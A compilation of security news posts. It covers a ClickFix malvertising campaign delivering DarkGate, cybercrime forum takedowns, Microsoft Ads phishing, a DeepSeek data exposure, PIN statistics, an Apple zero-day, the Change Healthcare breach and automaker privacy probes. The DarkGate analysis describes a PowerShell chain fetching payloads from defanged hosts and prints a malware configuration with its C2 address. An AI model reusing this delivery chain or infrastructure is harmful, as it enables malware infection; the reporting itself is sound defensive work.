IT News

During the past several months there have been numerous malware campaigns that use a technique something referred to as “ClickFix”. It often consists of a fake CAPTCHA or similar traffic validation page where visitors are instructed to paste and execute code in order to proceed.

We have started to see ClickFix attacks more and more via malicious Google ads as well. This is in contrast to typical phishing pages where victims download a so-called installer that contains malware.

In a recent malvertising campaign targeting the Notion brand, we observed these two techniques used at play. It’s quite possible the threat actors were collecting metrics to determine which one of the two gave them the most conversions via malware installs.

This blog post details this campaign that ultimately delivered the DarkGate malware loader.

Overview

Web traffic view

Delivery #1: PowerShell code via “ClickFix”

Malicious ad and social engineering

Threat actors created a Google ad for the popular utility application Notion. The first time we clicked on the ad, we were redirected to a site showing a “Verify you are human” page, also known as Cloudflare Turnstile. Except this was not the real Cloudflare, and merely a social engineering trick.

The HTML source code was obfuscated to only show gibberish interlaced with Russian comments, which we later determined was Rot13, a letter substitution cipher. This was likely used to hide the offending code from prying eyes and network rules:

After checking the box to verify we are human, we see new instructions, “Verification steps”, that involve pressing a number of key combinations. Windows + R launches the run dialog while Ctrl + V will paste whatever is in the clipboard. Supposedly this code is part of the verification process, but instead when pressing Enter, the victim will run a malicious command:

PowerShell and payload

The code copied into the clipboard is actually a command line that runs PowerShell:

The Base64 encoded string retrieves the following code from hxxps[:]//s2notion[.]com/in.php?action=1:

This downloads a binary from hxxps[:]//s2notion[.]com/in.php?action=2. and runs its. That file contains an AutoIt script that launches from:

"c:temptestAutoit3.exe" c:temptestscript.a3x

The following DarkGate configuration was extracted from it:

{'DarkGate': {'C2': [['155.138.149.77']], 'unknown_8': ['No'], 'name': ['DarkGate'], 'unknown_12': ['R0ijS0qCVITtS0e6xeZ'], 'unknown_13': ['6'], 'unknown_14': ['Yes'], 'port': ['80'], 'startup_persistence': ['Yes'], 'unknown_32': ['No'], 'check_display': ['Yes'], 'check_disk': ['No'], 'min_disk_size': ['100'], 'check_ram': ['No'], 'min_ram_size': ['4096'], 'check_xeon': ['No'], 'unknown_21': ['No'], 'unknown_23': ['Yes'], 'unknown_31': ['No'], 'unknown_24': ['N-traff'], 'campaign_id': ['user1'], 'unknown_26': ['No'], 'xor_key': ['sDcGdADE'], 'unknown_28': ['No'], 'unknown_29': ['2'], 'unknown_35': ['No'], 'tabla': ['a2THNyA]7u6Kiv$8k.F*ZrO"do1wL9P0 3}eCGDY{XVzctg,&EhJfsx=n)mpQUqljIW5SRMb4B([']}}

Delivery #2: signed executable

Malicious ad and decoy site

We saw this scenario after revisiting the malicious ad for a second time. Notice how the URL path is now including “/download/”.

This is the more traditional approach to malvertising for software downloads that we’ve seen for a while now. Victims download an executable after being tricked with a lookalike site. The file was found hosted on Github under the user profile herawtisabela1992:

This fake Notion installer was digitally signed (now revoked) by KDL CENTRAL LIMITED. Similar to the other binary mentioned in the first delivery technique, this one also extracts an AutoIt payload, with the same DarkGate configuration.

It’s interesting to note that the same GitHub user account previously distributed a backdoor called Warmcookie (aka Badspace) from:

raw[.]]githubusercontent[.]com/herawtisabela1992/check/refs/heads/main/920836164_x64.exe

Conclusion

We were not surprised to see the ClickFix social engineering attack here, but what made this campaign interesting what that it alternated between ClickFix and the typical file download.

It’s quite likely someone is tracking stats and comparing numbers to see which of the two delivery methods yields the most successful installs. If we had to put our money on it, we would bet that ClickFix is ahead. The file download technique remains effective, especially if the payload is digitally signed, but it could be relegated to second place in the near future.

Malwarebytes detects both payloads as Trojan.Dropper and Backdoor.DarkGate.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Indicators of Compromise

Malvertising infrastructure

notionbox[.]org
s2notion[.]com

Payloads

6b6676267c70fbeb3257f0bb9bce1587f0bdec621238eb32dd9f84b2bcd7e3ea
4fe8bbc88d7a8cc0eec24bd74951f1f00b5127e3899ae53de8dabd6ff417e6db

It’s not often that we get to share good news, so we wanted to grab this opportunity and showcase some progress made by law enforcement actions against cybercrime with you.

Europol notified us about the take-down of two of the largest cybercrime forums in the world. With over 10 million users, Nulled and Cracked serviced cybercriminals from all over the world with a quick entry point into the cybercrime scene.

On the forums people not only discussed how to optimize their cybercrime efforts but also provided several cybercrime-as-a-service options, including data, malware, and hacking tools.

Law enforcement agencies not only seized the forums but also managed to take down associated services like the money launderer Sellix and a “bulletproof” hosting service called StarkRDP, which enjoyed heavy promotion on both platforms and operated under the same suspects.

Bulletproof hosting refers to web hosting services that cater specifically to cybercriminals by allowing them to host illegal activities and content. These hosting providers promise anonymity, operate with very few rules, and typically ignore requests from law enforcement to remove harmful or illegal material.

These two forums also offered AI-based tools and scripts to automatically scan for security vulnerabilities and optimize attacks.

This operation was an international effort supported by Europol and the Federal Bureau of Investigation (FBI) involving law enforcement from Australia, France, Germany, Greece, Italy, Spain, and Romania.

In a separate action, Dutch police and the US Department of Justice (DOJ) dismantled an international cybercrime network called HeartSender (aka Saim Raza or The Manipulators). This crime network specializes in developing and selling phishing kits. Their tools to power spam campaigns attracted thousands of customers interested in sending vast amounts of phishing emails, stealing login credentials, and exploiting compromised systems.

Law enforcement seized a total of 39 domains and servers belonging to HeartSender in an international effort. The law enforcement agencies remotely disabled the illegal software sold through these servers. On the servers the police also found datasets including millions of victim records.

But they also found buyer records, which will be subject to a follow-up operation. Operations like HeartSender, Nulled, and Cracked make cybercrime accessible for aspiring criminals that have no working knowledge of programming or other computer skills. As always, we’ll have to wait and see how effective such actions are in the long run. As we all know, these “enablers” have a tendency to grow back in other places, not caring about their customers or their victims, only their Bitcoin wallets matter. But for now, it will take them some time to get back in action—time they can’t spend defrauding innocent victims.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Just days after we uncovered a campaign targeting Google Ads accounts, a similar attack has surfaced, this time aimed at Microsoft advertisers. These malicious ads, appearing on Google Search, are designed to steal the login information of users trying to access Microsoft’s advertising platform.

Microsoft does purchase ad space on its rival’s dominant search engine; however, we found Google sponsored results for “Microsoft Ads” (formerly known as Bing Ads) that contained malicious links created by impostors.

Through shared artifacts, we were able to identify additional phishing infrastructure targeting Microsoft accounts going back to a couple of years at least. We have reported these incidents to Google.

Fake Microsoft Ads caught on Google Search

Microsoft made an estimated $12.2 billion in search and news advertising revenues (including Bing) in 2023, which pales in comparison to its rival, Google, holding a much larger share of the search engine market.

Since the advertising ecosystem allows for an open competition between brands, Microsoft is trying to get traffic and earn clicks from Google searches. During our investigation, we saw sponsored results for Microsoft Ads and Bing Ads that managed to slip through Google’s security checks:

Redirection, cloaking and Cloudflare

The threat actors are using different techniques to evade detection and drop traffic from bots, security scanners and crawlers. Unwanted IP addresses (e.g. VPNs) are immediately redirected to a bogus marketing website (Figure 2). This is also known as a “white page”, meaning it looks innocent and hides its maliciousness.

Users that appear to be genuine are presented with a Cloudflare challenge to verify they are human. This is a legitimate instance of Cloudflare, unlike the “ClickFix” type-of-attacks that have become very common place and trick people into pasting and executing malicious code.

Rickroll for the cheaters

After a successful Cloudflare check, users are redirected to the final phishing page via a special URL, that acts as some sort of entry point for the malicious domain ads[.]mcrosoftt[.]com. You can see the network requests related to this redirection chain in Figure 4 below.

If you were to visit that domain directly instead of going through the proper ad click you’d be greeted with a rickroll, an internet meme designed to make fun of someone. The sandbox for the web urlscan.io has several examples of crawl requests for URLs on that server (37.120.222[.]165) that all went to the rickroll.

Phishing page

After much subversion, real victims finally see the phishing page for the Microsoft Advertising platform. The full URL in the address bar is meant to imitate the legitimate one (ads.microsoft.com).

The phishing page gives user a fake error message enticing them to reset their password and seemingly tries to get past 2-Step verification as well. Handling 2FA has become a standard feature in most phishing kits, due to the rise in user adoption of this additional security layer.

Larger campaign

Going back to urlscanio, we fed it the special entry URL and it was able to navigate to the phishing page. From there, we can look at the various web requests and find something to pivot on in order to identify additional infrastructure.

The favicon.ico file is one starting point and we can query for any scans that match its hash, excluding the official Microsoft domain. The results show that in the past week, there were several other domains that appear to be related to the theft of Microsoft Ads accounts.

But this campaign appears to go back further at least a couple of years and maybe more, although it becomes somewhat tricky to know if the malicious infrastructure is tied to the same threat actors. It’s worth noting that several of the domains are either hosted in Brazil or have the ‘.com.br‘ Brazilian top-level domain.

What we discovered may only be the tip of the iceberg; by starting to investigate compromised advertiser accounts we may very well have opened Pandora’s box. This isn’t only Google or Microsoft ad accounts we are talking about, but potentially for Facebook, and many others. Of course, our scope so far has been Google Search, but we know that other platforms are rife with such phishing attacks.

These recent malvertising campaigns highlight the ongoing threat of phishing through online advertising. While tech companies like Google work to combat these issues, users must remain vigilant. Here are some key steps you can take to protect yourself:

• Verify URLs: Always carefully examine the URL in your browser’s address bar before entering any credentials. Scrutinize URLs for inconsistencies or misspellings.
• Use 2-Step verification wisely: it adds an extra layer of security to your accounts, but you still need to pay attention to requests before granting them access.
• Regularly monitor your accounts: Check your advertising accounts for any suspicious activity such as changes in administrator accounts.
• Report Ads: If you encounter a suspicious ad, report it to for the benefit of other users.

We don’t just report on threats—we block them

Malwarebytes Browser Guard offers traditional ad-blocking augmented with advanced heuristic detection. Download it today.

Indicators of Compromise

The following IOCs are comprised of domains that shared attributes with our initial phishing page, including the favicon and images. Some of them go back further but are provided for threat hunters who may wish to further investigate these campaigns.

30yp[.]com
aboutadvertselive[.]com
aboutblngmicro[.]cloud
account-microsoft[.]online
account-microsoft[.]site
account-mircrosoft-ads[.]com
account[.]colndcx-app[.]com
accounts-ads[.]site
accounts-mircrosoft-ads[.]online
acount-exchang[.]store
admicrosoft[.]com
admicrsdft[.]com
ads-adversitingb[.]com
ads-dsas[.]site
ads-microsoft[.]click
ads-microsoft[.]coachb-learning[.]com
ads-microsoft[.]live
ads-microsoft[.]lubrine[.]com[.]br
ads-microsoft[.]online
ads-microsoft[.]shop
ads-microsoftz[.]online
ads-miicrosoft[.]com
ads-mlcrosft[.]com
ads-mlcrosoft-com[.]blokchaln[.]com
ads[.]microsoft[.]com[.]euroinvest[.]ge
ads[.]mlcr0soft[.]com
ads[.]mlcrosoft[.]com[.]ciree[.]com[.]br
ads[.]mlcrosoft[.]com[.]poezija[.]com[.]hr
ads[.]rnlcrosoft[.]com[.]euroinvest[.]ge
adslbing[.]com
adsmicro[.]exchangefastex[.]cloud
adsmicrosoft[.]shop
adsverstoni[.]com
advertiseliveonline[.]com
advertising-bing[.]site
advertising-mlcrosoft[.]org
adverts2023[.]online
advertsingsinginbing[.]com
agency-wasabi[.]com
app[.]beefylswap[.]top
bîlkub[.]com
bing-ads[.]com
bing[.]login-acount[.]me
bitmax-us[.]com
blngad[.]online
blseaccount[.]cloud
bltrue[.]colnhouse-fr[.]us
côinlíst[.]online
colneex-plalform[.]cloud
connec-exchan[.]site
digitechmedia[.]agency
forteautomobile[.]com
global-verifications[.]com
global-verify[.]com
homee-acount[.]com
itlinks[.]com[.]cn
krakeri-login[.]com
login-adsmicrosoft[.]helpexellent[.]com
login[.]adsadvertising[.]online
login[.]microsofttclicks[.]live
micrasofit[.]xyz
microosft[.]accounts-ads[.]site
microsoft-ads[.]website
microsoftadss[.]com
microsoftadversiting[.]cloud
microsoftbingads[.]com
microsofyt[.]adversing-publicidade[.]pro
mictrest[.]mnws[.]ru
mlcrosoft-bing-acces[.]click
mlcrosoftadvertlsing[.]online
mudinhox[.]site
ndnet[.]shop
phlyd[.]com
portfoliokrakenus[.]com
portfoliolkraken[.]com
portfoliopro-us[.]com
portfolioskranen[.]com
portofolioprospots[.]com
potfoliokeiolenen[.]com
potfoliokelaken[.]com
potfoliokelaneken[.]com
potfoliokenaiken[.]com
potfoliokenkren[.]com
potfolioketonelen[.]com
potfolioskaneken[.]com
potfolioskenaken[.]com
potfolioskraineken[.]com
potfolioskranaken[.]com
potfolioskraneken[.]com
pro-digitalus[.]com
prokrakenportfolio[.]com
rnlcrosoft[.]smartlabor[.]it
sig-in-mlcrosoft-advertisings[.]site
uiiadvertise[.]online
wvvw-microsoft[.]xyz
www-bingads[.]com
www-microsoftsads[.]com
www-v[.]userads[.]digital
www34[.]con-webs[.]com
www55[.]con-webs[.]com

ads-microsoft[.]bewears[.]com
ads[.]msicrosoft[.]com

The sudden rise of DeepSeek has raised concerns and questions, especially about the origin and destination of the training data, as well as the security of the data.

For those returning from a short holiday away from the news, DeepSeek is a new player on the Artificial Intelligence (AI) field. The Chinese startup has certainly taken the app stores by storm: In just a week after the launch it topped the charts as the most downloaded free app in the US. This caused an upset on the stock markets that cost nVidia and Oracle shareholders a lot of money.

DeepSeek has been called an open-source project, however this technically is not true because only the model’s outputs and certain aspects are publicly accessible. This makes it qualify as an open-weight model. Anyway, the important difference is that the underlying training data and code necessary for full reproduction of the models are not fully disclosed.

And it’s the data that pose a concern to many. OpenAI has accused DeepSeek of using its ChatGPT model to train DeepSeek’s AI chatbot, which triggered quite some memes. If only because OpenAI previously suffered accusations of using data that was not its own in order to train ChatGPT.

Authorities have started to ask questions as well. The Italian privacy regulator GPDP has asked DeepSeek to provide information about the data it processes in the chatbot, and its training data.  Because it sees a risk to the privacy of millions of Italian citizens, GDPD has demanded DeepSeek answers within 20 days questions about:

• Which personal data is collected
• The origin of the data
• Purpose for the collection
• Whether the data is stored on servers in China

According to the Italian press agency ANSA, DeepSeek disappeared on January 29, 2025 from Google and Apple’s app stores in Italy.

And if all that isn’t scary enough, researchers at Wiz have found a publicly accessible database belonging to DeepSeek.

“This database contained a significant volume of chat history, backend data and sensitive information, including log streams, API Secrets, and operational details. “

The database was not just accessible and readable, it was also open to control and privilege escalation within the DeepSeek environment. No authentication was required, so anybody that stumbled over the database was able to run queries to retrieve sensitive logs and actual plaintext chat messages, and even to steal plaintext passwords and local files.

Needless to say, this oversight put DeepSeek and its users at risk.

We have said this before and we’ll probably have to repeat it numerous times, but the need for fast developments in this field is creating privacy risks that we have never seen before, simply because security is an afterthought for the developers. So, no matter which AI chatbot you prefer, always be mindful of the information you feed it: It may find its way to unexpected and undesirable places.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Australian news outlet ABC NEWS analyzed a data set of 29 million 4-digit PIN numbers that people actually used to secure their devices, ATM withdrawals, building access, and more.

What the outlet discovered is both expected and disappointing: Too many people use insecure PIN codes to protect important parts of their lives.

Now, I feel compelled to add that I’ve always considered any four-digit string of numbers as simply too few numbers to secure anything important. It takes only 10,000 tries in a worst-case scenario for the attacker, which is not an awful lot for a determined—and sometimes machine-assisted—attacker.

My (Dutch) bank uses a five-digit number to access the app, although it still uses four digits for payments or to make withdrawals from an ATM. But that might be because that’s how the machines are programmed to work. Also, in those cases, entering the PIN itself could be considered a second factor in a multi-factor authentication (MFA) procedure since you already need to have possession of the card.

That said, ABC’s research shows that many of us are predictable when it comes to picking out our PINs. For example, it should come as no surprise that 0000 is popular since it is the default PIN code for many devices—and apparently many people don’t see the importance of changing it.

Whether this reflects our doubt in our own memory or it reflects a certain degree of laziness would require a deeper psychological analysis, but as with passwords, people tend to pick easy-to-remember options that are, for instance, the same digit repeated four times over, or a predictable sequence of four digits, such as 1234. They also prefer numbers that are easy to type, like the figure “2580” which goes straight down the numberpad.

Other predictable numbers stem from the fact that we use birthdays and birth-years so we can easily remember the PIN code. This is why we see a lot of pin numbers that start with 19 for a year or where the first digit of a month is either a 0 or a 1 which comes in the first or third place of the code, depending on the way you format your dates.

The worrying part is that by trying the first the options in the list ranked by popularity, an attacker can raise his chances of a breach to 11.7 %.

In some cases the attacker may only have five chances, so guess which ones they will be trying.

I have copied the top 10 PIN codes, so you can get an idea of which codes to avoid or change to improve the security level of them.

As in many situations, it’s prudent to remember that the option that is easiest to use is almost never the most secure.

Apple has released a host of security updates across many devices, including for a zero-day bug which is being actively exploited in iOS.

Apple said:

“A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 17.2.”

Devices affected are those that run:

• iPhone XS and later
• iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later
• macOS Sequoia
• Apple Watch Series 6 and later
• All models of Apple TV HD and Apple TV 4K

If you use any of these then you should install updates as soon as you can. To check if you’re using the latest software version, go to Settings (or System Settings) > General > Software Update. It’s also worth turning on Automatic Updates if you haven’t already, which you can do on the same screen.

Technical details about the zero-day

The zero-day vulnerability patched in this update is tracked as CVE-2025-24085. It is described as a use after free (UAF) issue in Apple’s Core Media framework that would allow an attacker to elevate privileges.

The Core Media framework handles multimedia applications like photos, videos, and real-time communication applications. UAF is a type of vulnerability that is the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code. In this case, successful exploitation could provide a malicious app with privileges on the affected device that it shouldn’t have.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

UnitedHealth says it now estimates that the data breach on its subsidiary Change Healthcare affected 190 million people, nearly doubling its previous estimate from October.

In May, UnitedHealth CEO Andrew Witty estimated that the ransomware attack compromised the data of a third of US individuals when he testified before the Senate Finance Committee on Capitol Hill. In October, this was largely confirmed when Change Healthcare reported a number of 100,000,000 affected individuals.

Besides the enormous number of victims, the story behind this ransomware attack is also very complex, because of the cybercriminals involved and how the first group that received the ransom payment disappeared without paying their affiliates.

The ALPHV/BlackCat ransomware group claimed the initial attack. The UnitedHealth Group reportedly paid $22 million to receive a decryptor and to prevent the attackers from publicly releasing the stolen data.

But shortly after the payment, ALPHV disappeared in an unconvincing exit scam designed to make it look as if the group’s website had been seized by the FBI, forgetting to pay its affiliates in the process. A month later, newcomer ransomware group RansomHub listed Change Healthcare as a victim on its own website, claiming to have the data that ALPHV stole.

According to BleepingComputer, the original attackers joined forces with RansomHub and never deleted the data. A few days later, the listing on the RansomHub leaks site disappeared, which usually means someone paid the ransom.

Stolen information

The data breach at Change Healthcare is the largest healthcare data breach in US history. Although Change Healthcare provided details about the types of medical and patient data that was stolen, it can’t provide exact details for every individual. However, the exposed information may include:

• Contact information: Names, addresses, dates of birth, phone numbers, and email addresses.
• Health insurance information: Details about primary, secondary, or other health plans/policies, insurance companies, member/group ID numbers, and Medicaid-Medicare-government payor ID numbers.
• Health information: Medical record numbers, providers, diagnoses, medicines, test results, images, and details of care and treatment.
• Billing, claims, and payment information: Claim numbers, account numbers, billing codes, payment card details, financial and banking information, payments made, and balances due.
• Other personal information: Social Security numbers, driver’s license or state ID numbers, and passport numbers.

Change Healthcare added:

“The information that may have been involved will not be the same for every impacted individual. To date, we have not yet seen full medical histories appear in the data review.”

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

• Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice they offer.
• Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
• Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
• Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
• Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
• Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
• Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Check your digital footprint

Malwarebytes has a free tool for you to check how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

Last week on Malwarebytes Labs:

• Your location or browsing habits could lead to price increases when buying online
• AI tool GeoSpy analyzes images and identifies locations in seconds
• 7-Zip bug could allow a bypass of a Windows security feature. Update now
• Warning: Don’t sell or buy a second hand iPhone with TikTok already installed
• Texas scrutinizes four more car manufacturers on privacy issues

Last week on ThreatDown:

• What is SQL injection (SQLi), and how can it be prevented?
• Mastercard fixes potentially catastrophic DNS typo

Stay safe!

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

This week on the Lock and Code podcast…

It’s Data Privacy Week right now, and that means, for the most part, that you’re going to see a lot of well-intentioned but clumsy information online about how to protect your data privacy. You’ll see articles about iPhone settings. You’ll hear acronyms for varying state laws. And you’ll probably see ads for a variety of apps, plug-ins, and online tools that can be difficult to navigate.

So much of Malwarebytes—from Malwarebytes Labs, to the Lock and Code podcast, to the engineers, lawyers, and staff at wide—work on data privacy, and we fault no advocate or technologist or policy expert trying to earnestly inform the public about the importance of data privacy.

But, even with good intentions, we cannot ignore the reality of the situation. Data breaches every day, broad disrespect of user data, and a lack of consequences for some of the worst offenders. To be truly effective against these forces, data privacy guidance has to encompass more than fiddling with device settings or making onerous legal requests to companies.

That’s why, for Data Privacy Week this year, we’re offering three pieces of advice that center on behavior. These changes won’t stop some of the worst invasions against your privacy, but we hope they provide a new framework to understand what you actually get when you practice data privacy, which is control.

You have control over who sees where you are and what inferences they make from that. You have control over whether you continue using products that don’t respect your data privacy. And you have control over whether a fast food app is worth giving up your location data to just in exchange for a few measly coupons.

Today, on the Lock and Code podcast, host David Ruiz explores his three rules for data privacy in 2025. In short, he recommends:

1. Less location sharing. Only when you want it, only from those you trust, and never in the background, 24/7, for your apps. 
2. More accountability. If companies can’t respect your data, respect yourself by dropping their products.
3. No more data deals. That fast-food app offers more than just $4 off a combo meal, it creates a pipeline into your behavioral data

Tune in today to listen to the full breakdown.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

The Texas Attorney General’s Office has started an investigation into how Ford, Hyundai, Toyota, and Fiat Chrysler collect, share, and sell consumer data, expanding an earlier probe launched last year into how modern automakers are potentially using customer driving data.

We’ve addressed cars and privacy at some length on Malwarebytes Labs and came to the conclusion—with the help of many experts in the field—that modern cars simply aren’t very good at it. Many politicians in the US agree with that point of view, too, as US senators have asked the Federal Trade Commission (FTC) to investigate car makers’ privacy practices.

As part of the investigation in Texas, the state’s Attorney General’s Office sent letters—or “notices”—to four automakers earlier this month, demanding written responses under oath.

The Notice delivered to Hyundai discusses “covered data,” which is defined as any information or data about a vehicle manufactured, sold, or leased by you, regardless of whether deidentified or anonymized. And selling data is defined as sharing, disclosing, or transferring of personal data in exchange for monetary or other valuable consideration by you to a third party.

The Notices sent to the car manufacturers are not all exactly the same, but it is clear what the Attorney General’s Office is after:

• Methods of collection used.
• Which third parties received the data and if any restrictions were placed on how the recipients used the data.
• The number of affected customers.
• How consent was obtained from these customers.

In April of 2024, Texas Attorney General Ken Paxton sent “civil investigative demands” to Kia, General Motors, Subaru and Mitsubishi seeking details of their data collection and sharing practices.

And in August, Paxton sued General Motors for selling customer driving data to third parties.

Only recently we reported how the Attorney General also went after the buyers of data like insurance company Allstate and its subsidiary Arity. Arity acts as a data broker which sold insurers the information to set prices on insurance premiums. The car manufacturers involved in that complaint are Toyota, Lexus, Mazda, Chrysler, Dodge, Fiat, Jeep, Maserati, and Ram. But they were not named as defendants in the complaint.

Paxton did single out a few mobile apps and warned them that they were violating Texas’ data privacy law. Those apps are: GasBuddy, Life360, Miles, MyRadar, SiriusXM and Tapestri.

An Allstate spokesperson stated that Arity “helps consumers get the most accurate auto insurance price after they consent in a simple and transparent way that fully complies with all laws and regulations.”

But according to the press release from the Attorney General, Allstate and other insurers used what they alleged to be covertly obtained data to justify raising Texans’ insurance rates.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.